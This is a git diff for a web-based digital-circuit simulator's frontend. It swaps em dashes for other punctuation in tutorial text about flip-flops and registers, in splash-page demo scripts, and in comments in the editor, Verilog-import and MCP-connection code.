           Hit the play button to auto-step, or step one cycle at a time. The count display shows the

--- a/apps/web/src/features/learn/registers/sections/DFlipFlopSection.tsx
+++ b/apps/web/src/features/learn/registers/sections/DFlipFlopSection.tsx
@@ -10,14 +10,14 @@ export function DFlipFlopSection() {
           A combinational circuit is a pure function: outputs depend only on current inputs, change
           every input and the output changes immediately. There&rsquo;s nowhere for state to live.
           The smallest piece of hardware that <em>does</em> have a place for state is the{' '}
-          <strong>D flip-flop</strong> &mdash; one bit of memory.
+          <strong>D flip-flop</strong>: one bit of memory.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           It has one input (<code>d</code>), one output (<code>q</code>), and a{' '}
           <strong>clock</strong>. Whatever value is on <code>d</code>
           when the clock ticks is captured and held on <code>q</code>
-          until the next tick. Between ticks the input can change all it wants &mdash;{' '}
-          <code>q</code> doesn&rsquo;t.
+          until the next tick. Between ticks the input can change all it wants, <code>q</code>{' '}
+          doesn&rsquo;t.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Toggle <code>d</code> below and watch nothing happen. Press the step button to advance the
@@ -29,7 +29,7 @@ export function DFlipFlopSection() {
         <CircuitEmbed
           circuit={DFlipFlop()}
           title="D flip-flop"
-          description="Toggle d, then step the clock — q captures d on the tick."
+          description="Toggle d, then step the clock, and q captures d on the tick."
         />
       </div>
     </section>

--- a/apps/web/src/features/learn/registers/sections/HeroSection.tsx
+++ b/apps/web/src/features/learn/registers/sections/HeroSection.tsx
@@ -6,8 +6,8 @@ export function HeroSection() {
           Registers
         </h1>
         <p className="mt-6 text-xl text-gray-500 dark:text-gray-300 leading-relaxed">
-          How a circuit remembers. Everything sequential &mdash; counters, state machines, CPUs
-          &mdash; is registers underneath.
+          How a circuit remembers. Everything sequential (counters, state machines, CPUs) is
+          registers underneath.
         </p>
       </div>
     </section>

--- a/apps/web/src/features/learn/registers/sections/RegisterSection.tsx
+++ b/apps/web/src/features/learn/registers/sections/RegisterSection.tsx
@@ -9,19 +9,18 @@ export function RegisterSection() {
       </h2>
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          A flip-flop captures its input on every clock edge. That&rsquo;s often more than you want
-          &mdash; a CPU register, for instance, should hold its value across many cycles and only
-          update when an instruction tells it to. The fix is one extra input:{' '}
-          <strong>write-enable</strong> (<code>we</code>). When <code>we</code> is high on the clock
-          edge, the register captures the new value. When it&rsquo;s low, the register holds
-          whatever was there before.
+          A flip-flop captures its input on every clock edge. That&rsquo;s often more than you want:
+          a CPU register, for instance, should hold its value across many cycles and only update
+          when an instruction tells it to. The fix is one extra input: <strong>write-enable</strong>{' '}
+          (<code>we</code>). When <code>we</code> is high on the clock edge, the register captures
+          the new value. When it&rsquo;s low, the register holds whatever was there before.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           A register is also <strong>parameterized by width</strong>.{' '}
           <code>Register(&#123; width: 1 &#125;)</code> is essentially a D flip-flop with
           write-enable. <code>Register(&#123; width: 8 &#125;)</code> holds eight bits.{' '}
           <code>Register(&#123; width: 32 &#125;)</code> holds a 32-bit word. Same primitive, same
-          semantics &mdash; the bit width changes, the structure doesn&rsquo;t.
+          semantics: the bit width changes, the structure doesn&rsquo;t.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Type a value into <code>data</code> (or click to scrub), toggle <code>we</code>, then step

--- a/apps/web/src/features/splash/ClaudeCTA.tsx
+++ b/apps/web/src/features/splash/ClaudeCTA.tsx
@@ -90,7 +90,7 @@ function CopyCommand({ command }: { command: string }) {
 }
 
 /**
- * Claude AI CTA section — "Ask Claude to build..." with cycling typewriter
+ * Claude AI CTA section: "Ask Claude to build..." with cycling typewriter
  * and MCP install command. Reusable across landing page sections.
  */
 export function ClaudeCTA() {

--- a/apps/web/src/features/splash/ClaudeDemoSection.tsx
+++ b/apps/web/src/features/splash/ClaudeDemoSection.tsx
@@ -26,7 +26,7 @@ import { CodeWithHovers } from './CodeWithHovers';
 import { FIGLET_DEMO_CODE, FigletDemo } from './Hero';
 
 // ============================================================================
-// Demo circuits (self-contained — the gallery has its own copies of shared ones)
+// Demo circuits (self-contained: the gallery has its own copies of shared ones)
 // ============================================================================
 
 const HalfAdder = circuit('HalfAdder', {
@@ -136,7 +136,7 @@ const DEMO_SCRIPT: TermLine[] = [
   {
     type: 'text',
     content:
-      'Your half adder is live. Toggle the switches to try all four input combinations — sum is XOR(a,b), carry is AND(a,b).',
+      'Your half adder is live. Toggle the switches to try all four input combinations: sum is XOR(a,b), carry is AND(a,b).',
     delay: 300,
     typewriter: true,
     typeSpeed: 12,
@@ -192,7 +192,7 @@ const FullAdder = circuit('FullAdder', {
       {
         type: 'text',
         content:
-          'A full adder adds three bits — a, b, and carry-in — producing sum and carry-outputs. Chain four of these and you have the ALU inside a CPU.',
+          'A full adder adds three bits (a, b, and carry-in), producing sum and carry-outputs. Chain four of these and you have the ALU inside a CPU.',
         delay: 300,
         typewriter: true,
         typeSpeed: 12,
@@ -224,7 +224,7 @@ const FullAdder = circuit('FullAdder', {
       {
         type: 'text',
         content:
-          'Your full adder is live. Toggle switches to try all eight input combinations — carry-out lights when two or more inputs are high.',
+          'Your full adder is live. Toggle switches to try all eight input combinations: carry-out lights when two or more inputs are high.',
         delay: 300,
         typewriter: true,
         typeSpeed: 12,
@@ -265,7 +265,7 @@ const Counter2Bit = circuit('Counter2Bit', {
       {
         type: 'text',
         content:
-          'A synchronous 2-bit counter — two D flip-flops with toggle logic. Bit 0 flips every cycle, bit 1 flips when bit 0 is high. Counts 0, 1, 2, 3, repeat.',
+          'A synchronous 2-bit counter: two D flip-flops with toggle logic. Bit 0 flips every cycle, bit 1 flips when bit 0 is high. Counts 0, 1, 2, 3, repeat.',
         delay: 300,
         typewriter: true,
         typeSpeed: 12,
@@ -293,7 +293,7 @@ const Counter2Bit = circuit('Counter2Bit', {
       {
         type: 'text',
         content:
-          'Your counter is live. Click Tick to advance — the LEDs count in binary: 00 → 01 → 10 → 11 → 00.',
+          'Your counter is live. Click Tick to advance, and the LEDs count in binary: 00 → 01 → 10 → 11 → 00.',
         delay: 300,
         typewriter: true,
         typeSpeed: 12,
@@ -327,7 +327,7 @@ const Toggle = circuit('Toggle', {
       { type: 'blank', content: '', delay: 400 },
       {
         type: 'text',
-        content: 'A DFlipFlop with inverted feedback — Q toggles on every rising clock edge.',
+        content: 'A DFlipFlop with inverted feedback, so Q toggles on every rising clock edge.',
         delay: 300,
         typewriter: true,
         typeSpeed: 12,
@@ -355,7 +355,7 @@ const Toggle = circuit('Toggle', {
       {
         type: 'text',
         content:
-          'Your toggle is live. Click the Tick button to advance the clock — Q flips on every rising edge.',
+          'Your toggle is live. Click the Tick button to advance the clock, and Q flips on every rising edge.',
         delay: 300,
         typewriter: true,
         typeSpeed: 12,
@@ -751,7 +751,7 @@ function ScriptedTerminal({
     if (visibleCount === 0) return;
 
     // Walk up to find the nearest scrollable ancestor (the terminal's own
-    // overflow-y container) and scroll only it — never the page. Using
+    // overflow-y container) and scroll only it, never the page. Using
     // scrollIntoView would cascade through every scrollable ancestor and
     // drag the viewport along when this section is off-screen.
     const el = bottomRef.current;
@@ -824,9 +824,9 @@ const HERO_DEMOS: HeroDemo[] = [
   },
   // Figlet → ROM: the showcase from further down the page, lifted up so users
   // see the "npm packages compile straight into hardware" pitch right in the
-  // hero. Self-driving (auto-runs once selected — see effect in HeroBrowserWindow).
+  // hero. Self-driving (auto-runs once selected; see effect in HeroBrowserWindow).
   // Code is intentionally wider than the 340px panel so the wider definitions
-  // (factory calls + the npm imports) read naturally — the panel scrolls.
+  // (factory calls + the npm imports) read naturally; the panel scrolls.
   {
     key: 'figlet',
     label: 'Figlet → ROM',
@@ -973,7 +973,7 @@ export interface ClaudeDemoSectionProps {
   onComplete?: () => void;
   /**
    * When true, the scripted demo auto-plays immediately on mount regardless
-   * of scroll position. Defaults to false — the demo waits until its desktop
+   * of scroll position. Defaults to false; the demo waits until its desktop
    * container scrolls into view before starting. Useful for placing the
    * component further down the page without triggering a hidden animation.
    */
@@ -1003,7 +1003,7 @@ export function ClaudeDemoSection({ onComplete, autoPlay = false }: ClaudeDemoSe
   // the CSS transition duration on the grid columns and as the timeout
   // between expanded=true firing and canvasReady=true firing. Decoupled
   // from the terminal's text fade-out (duration-500 on TerminalWindow's
-  // opacity transition) — the text fades quickly while the column itself
+  // opacity transition); the text fades quickly while the column itself
   // slides more deliberately, so the reader's attention is freed from
   // the transcript before the column finishes giving its space to the
   // canvas.
@@ -1057,7 +1057,7 @@ export function ClaudeDemoSection({ onComplete, autoPlay = false }: ClaudeDemoSe
 
   const heroRef = useRef<HeroBrowserWindowHandle>(null);
 
-  // Index into HERO_DEMOS — HalfAdder (index 0) is what the scripted intro
+  // Index into HERO_DEMOS; HalfAdder (index 0) is what the scripted intro
   // builds, so we start there. Cycling fires swapCircuit on the hero handle.
   const [demoIndex, setDemoIndex] = useState(0);
   const cycleDemo = useCallback((delta: number) => {
@@ -1133,7 +1133,7 @@ export function ClaudeDemoSection({ onComplete, autoPlay = false }: ClaudeDemoSe
             firmware, watch them run cycle-by-cycle, and synthesize to Verilog.
           </p>
           <div className="mt-6 flex items-center gap-3 flex-wrap">
-            {/* Primary action — keeps the hero framed around "this is a
+            {/* Primary action, keeps the hero framed around "this is a
                 hardware framework", not "this is an MCP install". The editor
                 is a secondary, zero-friction "try it now" path; the MCP
                 CopyCommand sits last so power users still see it without it
@@ -1164,7 +1164,7 @@ export function ClaudeDemoSection({ onComplete, autoPlay = false }: ClaudeDemoSe
               // interpolate. Mixing units (% on one side, fr on the other)
               // makes the browser snap-to instead of animate.
               gridTemplateColumns: expanded ? '0fr 100fr' : '38fr 62fr',
-              // Gap also collapses to 0 in expanded state — otherwise the
+              // Gap also collapses to 0 in expanded state; otherwise the
               // canvas column sits 16px right of where the rest of the
               // hero content's left edge is, misaligning with the rest of
               // the page after the terminal slides away.
@@ -1192,7 +1192,7 @@ export function ClaudeDemoSection({ onComplete, autoPlay = false }: ClaudeDemoSe
 
             <HeroBrowserWindow ref={heroRef} canvasReady={canvasReady} />
 
-            {/* Side cycle arrows — pinned to the canvas's vertical centre and
+            {/* Side cycle arrows, pinned to the canvas's vertical centre and
               tucked against the left/right edges. Hero is full-width post-
               collapse, so the arrows naturally land far apart, hinting at
               side-to-side navigation. Pointer-events stay off the wrapper
@@ -1241,7 +1241,7 @@ export function ClaudeDemoSection({ onComplete, autoPlay = false }: ClaudeDemoSe
           </div>
         </div>
 
-        {/* Demo picker pills — animates in below the hero once the canvas
+        {/* Demo picker pills, animates in below the hero once the canvas
             is live, mirroring the figlet demo's picker further down. */}
         {canvasReady && (
           <div className="mt-6 flex items-center justify-center gap-2 flex-wrap animate-in fade-in slide-in-from-bottom-2 duration-500">

--- a/apps/web/src/features/splash/CodeWithHovers.tsx
+++ b/apps/web/src/features/splash/CodeWithHovers.tsx
@@ -1,5 +1,5 @@
 /**
- * CodeWithHovers — sugar-high–tokenised code rendered as proper React
+ * CodeWithHovers: sugar-high–tokenised code rendered as proper React
  * JSX, with VS Code–style hover popups (Radix Tooltip) on a small
  * dictionary of known identifiers.
  *
@@ -11,12 +11,12 @@
  *   Radix Tooltip directly hands all of that lifecycle to Radix.
  *
  * Tokenisation: sugar-high exposes `tokenize(code)` which returns
- *   Array<[typeId, text]> — we map each token to a styled <span> and
+ *   Array<[typeId, text]>. We map each token to a styled <span> and
  *   wrap identifiers that match HOVER_DICT in a Radix Tooltip. The
  *   typeId → CSS-var-color map is hardcoded against sugar-high 1.1.0's
  *   TokenTypes ordering (identifier=0, keyword=1, string=2, class=3,
  *   property=4, entity=5, jsxliterals=6, sign=7, comment=8, break=9,
- *   space=10) — see node_modules/sugar-high/lib/index.js if it changes.
+ *   space=10); see node_modules/sugar-high/lib/index.js if it changes.
  *
  * Theme: same --sh-* CSS variables HighlightedCode uses (set on a
  *   wrapper class string) so light/dark themes pick up the right
@@ -29,7 +29,7 @@ import { tokenize } from 'sugar-high';
 import { cn } from '@/lib/utils';
 
 type HoverEntry = {
-  /** Mono-styled top line — a short signature or type form. */
+  /** Mono-styled top line: a short signature or type form. */
   signature?: string;
   /** Plain-text description below. One sentence. */
   description: string;
@@ -48,11 +48,11 @@ const HOVER_DICT: Record<string, HoverEntry> = {
   inputs: {
     signature: 'inputs?: Record<string, PortType>',
     description:
-      'Input ports — a map of port names to types (bit, bus(n)). Port names autocomplete in connect.',
+      'Input ports: a map of port names to types (bit, bus(n)). Port names autocomplete in connect.',
   },
   outputs: {
     signature: 'outputs?: Record<string, PortType>',
-    description: 'Output ports — same shape as inputs.',
+    description: 'Output ports, same shape as inputs.',
   },
   nodes: {
     signature: 'nodes?: Record<string, BuiltCircuit>',
@@ -113,7 +113,7 @@ const TYPE_TO_COLOR: Record<number, string | undefined> = {
   10: undefined,
 };
 
-// GitHub light/dark palette as Tailwind arbitrary CSS properties —
+// GitHub light/dark palette as Tailwind arbitrary CSS properties,
 // identical to HighlightedCode so themes match across both renderers.
 const SH_THEME_CLASSES = [
   '[--sh-keyword:#d73a49]',
@@ -156,7 +156,7 @@ export function CodeWithHovers({ code, className, enabled = true }: CodeWithHove
         <code>
           {tokens.map(([type, text], i) => {
             const color = TYPE_TO_COLOR[type];
-            // Hoverable purely on text match — the dictionary is the
+            // Hoverable purely on text match; the dictionary is the
             // source of truth, regardless of how sugar-high classified
             // the token (so capitalised gates like `Xor` / `And` which
             // come back as `class`, and methods like `to` which come

--- a/apps/web/src/features/splash/Hero.tsx
+++ b/apps/web/src/features/splash/Hero.tsx
@@ -40,7 +40,7 @@ type HeroLayout = Record<string, { x: number; y: number }>;
 // Hero demo circuits
 // ============================================================================
 
-// figlet — a real npm package — renders ASCII-art text at module-load time.
+// figlet, a real npm package, renders ASCII-art text at module-load time.
 // We bake the resulting bytes into a hardware ROM and stream them through a
 // hardware Console, character by character, like a typewriter.
 //
@@ -85,7 +85,7 @@ export const FigletDemo = circuit('FigletDemo', {
   connect: ({ nodes: { src, term } }) => [src.byte.to(term.data), src.strobe.to(term.we)],
 });
 
-// Source string used by the splash hero picker — same content as DEMOS[0].code
+// Source string used by the splash hero picker; same content as DEMOS[0].code
 // below, exported so ClaudeDemoSection can render it without duplicating the
 // figlet ROM-generation logic. Kept as a free const rather than read out of
 // DEMOS at runtime to avoid a circular-feeling self-reference.
@@ -95,7 +95,7 @@ import smallFont from 'figlet/fonts/Small.js';
 figlet.parseFont('Small', smallFont);
 
 // Render ASCII-art at compile time with a real npm package,
-// then stream the bytes through hardware — letter by letter.
+// then stream the bytes through hardware, letter by letter.
 const banner = figlet.textSync('Simten', { font: 'Small' });
 const ascii = [...banner].map(c => c.charCodeAt(0));
 const bannerBytes = Array.from({ length: 256 }, (_, i) =>
@@ -210,7 +210,7 @@ import smallFont from 'figlet/fonts/Small.js';
 figlet.parseFont('Small', smallFont);
 
 // Render ASCII-art at compile time with a real npm package,
-// then stream the bytes through hardware — letter by letter.
+// then stream the bytes through hardware, letter by letter.
 const banner = figlet.textSync('Simten', { font: 'Small' });
 const ascii = [...banner].map(c => c.charCodeAt(0));
 const bannerBytes = Array.from({ length: 256 }, (_, i) =>
@@ -356,7 +356,7 @@ const Mux2to1 = circuit('Mux2to1', {
 ];
 
 // ============================================================================
-// Window chrome (simpler than ClaudeDemoSection's — no tabs, no MCP badge)
+// Window chrome (simpler than ClaudeDemoSection's: no tabs, no MCP badge)
 // ============================================================================
 
 function HeroWindow({ children }: { children: ReactNode }) {
@@ -392,7 +392,7 @@ export function Hero() {
 
   // Auto-start the figlet demo by handing off to the simulator's own auto-run
   // engine. This way the play/pause button (which talks to the same engine)
-  // can stop it normally — we're not running a competing timer in user-land.
+  // can stop it normally; we're not running a competing timer in user-land.
   // Other demos stay user-driven; switching demos clears any in-flight run.
   const desktopEmbedRef = useRef<CircuitEmbedHandle>(null);
   const mobileEmbedRef = useRef<CircuitEmbedHandle>(null);

--- a/apps/web/src/features/splash/ShowcaseSection.tsx
+++ b/apps/web/src/features/splash/ShowcaseSection.tsx
@@ -93,7 +93,7 @@ const SHOWCASE_ITEMS = [
   {
     title: '8-bit ALU',
     description:
-      'ADD, SUB, AND, OR, XOR, NOT, SHL, SHR — selected by a 3-bit opcode. Zero, carry, and negative flags.',
+      'ADD, SUB, AND, OR, XOR, NOT, SHL, SHR, selected by a 3-bit opcode. Zero, carry, and negative flags.',
     stats: '145 lines · 8 operations · 3 flags',
   },
   {
@@ -105,7 +105,7 @@ const SHOWCASE_ITEMS = [
   {
     title: 'Snake',
     description:
-      'A complete game running on a simulated screen. No software, no ROM — pure hardware state machines driving an 8x8 display.',
+      'A complete game running on a simulated screen. No software, no ROM, just pure hardware state machines driving an 8x8 display.',
     stats: '157 lines · raster display · keyboard input',
   },
 ];

--- a/apps/web/src/features/visual-editor/components/EditorWorkspace.tsx
+++ b/apps/web/src/features/visual-editor/components/EditorWorkspace.tsx
@@ -1,5 +1,5 @@
 /**
- * EditorWorkspace — the full /editor page shell.
+ * EditorWorkspace: the full /editor page shell.
  *
  * Combines Monaco code editor, CircuitCanvas, clock controls,
  * Verilog export, MCP connection, and example picker.
@@ -143,8 +143,8 @@ interface EditorWorkspaceProps {
   initialSource?: string;
   /**
    * Running as the standalone local MCP viewer (a separate client-only build,
-   * not a route on simten.dev). In this mode there's no server, so Share — which
-   * POSTs to a server function — is omitted, and the brand links out to the
+   * not a route on simten.dev). In this mode there's no server, so Share (which
+   * POSTs to a server function) is omitted, and the brand links out to the
    * marketing site rather than through the (absent) router.
    */
   standalone?: boolean;
@@ -159,7 +159,7 @@ export function EditorWorkspace({
   const circuit = useCircuitStore((state) => state.circuit);
   const { resolvedTheme } = useTheme();
 
-  // Editor source — lifted here from the (now-deleted) TSEditor so the compile
+  // Editor source, lifted here from the (now-deleted) TSEditor so the compile
   // hook and the store-wiring effects can read it.
   const [code, setCode] = useState(initialSource ?? '');
   const codeRef = useRef(code);
@@ -175,10 +175,10 @@ export function EditorWorkspace({
   });
 
   // Track whether the editor source is effectively empty so we only show the
-  // "Load an example" picker when the user has actually cleared their code —
+  // "Load an example" picker when the user has actually cleared their code,
   // not during the boot window between mount and first compile.
   const [codeEmpty, setCodeEmpty] = useState((initialSource ?? '').trim() === '');
-  // Don't render the picker during the boot window — the resizable panels and
+  // Don't render the picker during the boot window; the resizable panels and
   // Monaco haven't laid out yet so the picker would render at near-zero width
   // (squished column on the left).
   const [bootDone, setBootDone] = useState(false);
@@ -189,13 +189,13 @@ export function EditorWorkspace({
 
   // Build a BuiltCircuit-like object from the compile result for useCircuitSimulator.
   // When the editor's source was compiled via sandbox.compile(), evals are already
-  // registered in the sandbox — no need to transfer them via evalSources.
+  // registered in the sandbox, so no need to transfer them via evalSources.
   const editorBuiltCircuit = useMemo<import('@simten/core/circuit').BuiltCircuit | null>(() => {
     if (!compiler.result || !circuit) return null;
     return builtFromIR(circuit, [...compiler.result.libraryCircuits, ...compiler.result.circuits]);
   }, [compiler.result, circuit]);
 
-  // Verilog export button state — mirrors shareStatus. Export used to fail into
+  // Verilog export button state; mirrors shareStatus. Export used to fail into
   // a bare console.error, which was survivable when the only failure was a throw
   // but not now that it can also succeed with holes in it (see below).
   const [exportStatus, setExportStatus] = useState<
@@ -218,13 +218,13 @@ export function EditorWorkspace({
   // Editor handle for imperative get/set of the Monaco source.
   const editorRef = useRef<SimtenCodeEditorHandle>(null);
   // requestId of an in-flight show_circuit render-ack (set in onSource, cleared
-  // when the resulting compile succeeds/fails — see handleCompile / handleCompileError).
+  // when the resulting compile succeeds/fails; see handleCompile / handleCompileError).
   const pendingRenderRef = useRef<string | null>(null);
 
   // Track whether we've loaded content so we can skip the first MCP cache replay
   const hasLoadedContentRef = useRef(false);
 
-  // Export to Verilog — uses library store
+  // Export to Verilog, uses library store
   const handleExportVerilog = useCallback(() => {
     const lib = useCircuitLibraryStore.getState();
     let currentCircuit = useCircuitStore.getState().circuit;
@@ -252,7 +252,7 @@ export function EditorWorkspace({
           kind: 'error',
           message: `Can't export: ${count} unsupported ${count === 1 ? 'node' : 'nodes'} (${names.slice(0, 3).join(', ')})`,
         });
-        console.error('Verilog export blocked — unsupported primitives:', unsupported);
+        console.error('Verilog export blocked, unsupported primitives:', unsupported);
         return;
       }
       setExportStatus({ kind: 'idle' });
@@ -321,7 +321,7 @@ export function EditorWorkspace({
     }
   }, []);
 
-  // ── Simulation — uses same sandbox-backed hook as embeds ──
+  // ── Simulation, uses same sandbox-backed hook as embeds ──
   // The editor already compiled source via sandbox.compile(), so evals exist in the sandbox.
   // useCircuitSimulator sends the harnessed Circuit IR to the sandbox via compileIR.
   // Cast needed because useCircuitSimulator requires a BuiltCircuit; we always
@@ -355,7 +355,7 @@ export function EditorWorkspace({
   const simRef = useRef(sim);
   simRef.current = sim;
 
-  // Stable canvas callbacks — read sim via ref so they never change reference.
+  // Stable canvas callbacks: read sim via ref so they never change reference.
   // Without this, inline lambdas here cause projectedNodes to recompute on every
   // sim tick (portValues changes → EditorWorkspace re-renders → new fn refs →
   // projectedNodes recomputes → setNodes → ReactFlow churns).
@@ -408,7 +408,7 @@ export function EditorWorkspace({
   });
 
   // On each successful compile, push the result into the selection stores. Set
-  // the library FIRST — applyToCanvas fires inside setCompiledCircuits and needs
+  // the library FIRST; applyToCanvas fires inside setCompiledCircuits and needs
   // the full library (including user circuits) before adding harness components.
   // Also acknowledges an in-flight show_circuit render request (success).
   useEffect(() => {
@@ -580,11 +580,11 @@ export function EditorWorkspace({
                   </span>
                 </Button>
 
-                {/* Sandbox indicator — when MCP-linked, the file is the source of truth */}
+                {/* Sandbox indicator: when MCP-linked, the file is the source of truth */}
                 {mcpStatus === 'connected' && (
                   <span
                     className="hidden md:inline text-[11px] leading-tight text-muted-foreground pl-2"
-                    title="This editor is a sandbox view. The file Claude edits (from the terminal) is the source of truth; edits here are local experiments — ask Claude to save them, or use Share."
+                    title="This editor is a sandbox view. The file Claude edits (from the terminal) is the source of truth; edits here are local experiments; ask Claude to save them, or use Share."
                   >
                     Sandbox · file is source of truth
                   </span>

--- a/apps/web/src/features/visual-editor/components/VerilogImportSheet.tsx
+++ b/apps/web/src/features/visual-editor/components/VerilogImportSheet.tsx
@@ -1,5 +1,5 @@
 /**
- * VerilogImportSheet — paste a module, drop a folder, or point at a GitHub repo,
+ * VerilogImportSheet: paste a module, drop a folder, or point at a GitHub repo,
  * and get editable simten source.
  *
  * Posts to /api/verilog-import (the synth container's `import` yosys target +
@@ -104,8 +104,8 @@ export function VerilogImportSheet({ onImport }: { onImport: (source: string) =>
   );
 
   const topCandidates = useMemo(() => detectTopCandidates(allSources), [allSources]);
-  // Follow the detected root — for a single pasted module that is the module
-  // itself, for a folder it is whichever root reaches the most of the file set —
+  // Follow the detected root: for a single pasted module that is the module
+  // itself, for a folder it is whichever root reaches the most of the file set,
   // until the user picks something else.
   const top = chosenTop ?? topCandidates[0] ?? '';
   const params = useMemo(() => (top ? parseParameters(allSources, top) : []), [allSources, top]);
@@ -169,7 +169,7 @@ export function VerilogImportSheet({ onImport }: { onImport: (source: string) =>
           kind: 'error',
           message:
             resp.status === 403
-              ? "GitHub's rate limit (60 requests an hour, per IP) is used up — try again later, or drop the files instead."
+              ? "GitHub's rate limit (60 requests an hour, per IP) is used up; try again later, or drop the files instead."
               : `Couldn't read that repo (HTTP ${resp.status})`,
         });
         return;
@@ -244,7 +244,7 @@ export function VerilogImportSheet({ onImport }: { onImport: (source: string) =>
       if (!path) {
         setStatus({
           kind: 'error',
-          message: `No file named ${wanted} in this repo — attach it, or point ${p.name} at one of the files below.`,
+          message: `No file named ${wanted} in this repo. Attach it, or point ${p.name} at one of the files below.`,
         });
         return;
       }
@@ -400,7 +400,7 @@ export function VerilogImportSheet({ onImport }: { onImport: (source: string) =>
 
         {/* ── Local intake ──────────────────────────────────────────────── */}
         {/* biome-ignore lint/a11y/noStaticElementInteractions: a drop target is
-            not a control — the same files are reachable through the two buttons
+            not a control; the same files are reachable through the two buttons
             inside it, so nothing here is keyboard-only-inaccessible. */}
         <div
           onDrop={handleDrop}
@@ -599,8 +599,8 @@ export function VerilogImportSheet({ onImport }: { onImport: (source: string) =>
               ))}
             </ul>
             <p className="mt-1.5 text-muted-foreground">
-              The source is in the editor — these are usually undeclared or misspelled signals in
-              the Verilog.
+              The source is in the editor; these are usually undeclared or misspelled signals in the
+              Verilog.
             </p>
           </div>
         )}

--- a/apps/web/src/features/visual-editor/components/index.ts
+++ b/apps/web/src/features/visual-editor/components/index.ts
@@ -1,5 +1,5 @@
 /**
- * Component exports — thin shell only.
+ * Component exports: thin shell only.
  * All editor components are in @simten/ui/editor.
  */
 

--- a/apps/web/src/features/visual-editor/verilog-project.test.ts
+++ b/apps/web/src/features/visual-editor/verilog-project.test.ts
@@ -1,7 +1,7 @@
 /**
  * The import sheet reads a Verilog project with regexes rather than a second
  * yosys round trip, so these are the cases that decide whether it asks the user
- * the right question — or the wrong one.
+ * the right question, or the wrong one.
  */
 
 import { describe, expect, it } from 'vitest';

--- a/apps/web/src/features/visual-editor/verilog-project.ts
+++ b/apps/web/src/features/visual-editor/verilog-project.ts
@@ -1,5 +1,5 @@
 /**
- * Reading a Verilog project well enough to import it — no yosys round trip.
+ * Reading a Verilog project well enough to import it, with no yosys round trip.
  *
  * The import sheet's job is to ask as little as possible. yosys already prunes
  * unreachable modules, so "which files" never needs asking; the RTL declares its
@@ -30,7 +30,7 @@ export interface ParamDecl {
   defaultValue: string;
   /**
    * `string` and `number` can be sent as `chparam`. `expression` covers defaults
-   * like `ALIGN = COMPRESSED` that only mean something once elaborated — they
+   * like `ALIGN = COMPRESSED` that only mean something once elaborated; they
    * are shown, but left to the RTL unless the user types over them.
    */
   kind: 'string' | 'number' | 'expression';
@@ -111,17 +111,17 @@ function reachableCount(graph: Map<string, Set<string>>, root: string): number {
 }
 
 /**
- * Modules that nothing else instantiates — the roots of the design — with the
+ * Modules that nothing else instantiates (the roots of the design) with the
  * one that pulls in the most of the file set first.
  *
  * "The last module in the file" is the obvious guess and a bad one across
  * several files: SERV's last module is `serv_state`, a leaf. Its actual roots
  * are `serv_rf_top` and `serv_synth_wrapper`, which is exactly the case where
- * the user has to be asked — but `serv_rf_top` reaches thirteen more modules
+ * the user has to be asked, but `serv_rf_top` reaches thirteen more modules
  * than the wrapper does, so it can at least be offered first.
  *
  * Falls back to every declared module if the scan finds no roots at all, which
- * is what a cyclic or unparsed file set looks like — a long list beats none.
+ * is what a cyclic or unparsed file set looks like, and a long list beats none.
  */
 export function detectTopCandidates(sources: ProjectFile[]): string[] {
   const blocks = moduleBlocks(sources);
@@ -217,7 +217,7 @@ export function parseRepoUrl(input: string): RepoRef | undefined {
   if (scheme && !/^https?$/i.test(scheme[1])) return undefined;
   const withoutScheme = trimmed.replace(/^https?:\/\//i, '');
   // Anything with a dot before the first slash is a host; only github's counts.
-  // This is what lets `github.com/olofk/serv` through — the form the address
+  // This is what lets `github.com/olofk/serv` through: the form the address
   // bar shows, and the one this field's own placeholder suggests.
   const host = /^([^/]+)\//.exec(withoutScheme)?.[1]?.toLowerCase();
   if (host?.includes('.') && host !== 'github.com' && host !== 'www.github.com') return undefined;
@@ -235,8 +235,8 @@ export function parseRepoUrl(input: string): RepoRef | undefined {
 /**
  * Folders that directly contain Verilog, deepest path first with a count, so the
  * picker can lead with `rtl/` rather than the repo root. A repo URL alone is not
- * enough to import — SERV has 77 `.v` files across benches, board wrappers and
- * test data — so the folder is the real unit of choice.
+ * enough to import (SERV has 77 `.v` files across benches, board wrappers and
+ * test data) so the folder is the real unit of choice.
  */
 export function sourceFolders(paths: string[]): { folder: string; count: number }[] {
   const counts = new Map<string, number>();

--- a/apps/web/src/hooks/useMCPConnection.ts
+++ b/apps/web/src/hooks/useMCPConnection.ts
@@ -1,5 +1,5 @@
 /**
- * useMCPConnection — WebSocket connection to the MCP server.
+ * useMCPConnection: WebSocket connection to the MCP server.
  *
  * Handles:
  * - Connects using the token + port from the URL fragment (show_circuit sets
@@ -29,7 +29,7 @@ export interface MCPMessage {
 
 export interface MCPCallbacks {
   /** Called when new circuit source is pushed from Claude Code. `requestId` is
-   *  present when the server is awaiting a render acknowledgment — call
+   *  present when the server is awaiting a render acknowledgment; call
    *  `sendRenderResult(requestId, …)` once compile finishes. */
   onSource?: (source: string, requestId?: string) => void;
   /** Called when a file-deleted event is received */
@@ -49,7 +49,7 @@ export interface MCPCallbacks {
 const RETRY_INTERVAL = 5000;
 /** Reconnect a bounded number of times before giving up. The MCP's port can move
  *  (dynamic port) and its token is per-process, so a dropped socket may mean the
- *  server is gone or has a new identity — don't loop on a stale port forever. */
+ *  server is gone or has a new identity, so don't loop on a stale port forever. */
 const MAX_RECONNECT_ATTEMPTS = 5;
 const LS_KEY = 'simten:mcp-connection';
 
@@ -89,7 +89,7 @@ function parseFragmentParams(): { token: string; port: number } | null {
   const port = params.get('port');
 
   if (token && port) {
-    // Clean the URL immediately — remove the fragment
+    // Clean the URL immediately: remove the fragment
     window.history.replaceState(null, '', window.location.pathname + window.location.search);
     const parsed = { token, port: parseInt(port, 10) };
     saveConnectionParams(parsed);
@@ -191,7 +191,7 @@ export function useMCPConnection(callbacks: MCPCallbacks) {
 
     ws.onclose = (event) => {
       wsRef.current = null;
-      // 4001 = invalid token (stale localStorage) — clear and stop retrying
+      // 4001 = invalid token (stale localStorage); clear and stop retrying
       if (event.code === 4001) {
         try {
           localStorage.removeItem(LS_KEY);
@@ -203,7 +203,7 @@ export function useMCPConnection(callbacks: MCPCallbacks) {
         return;
       }
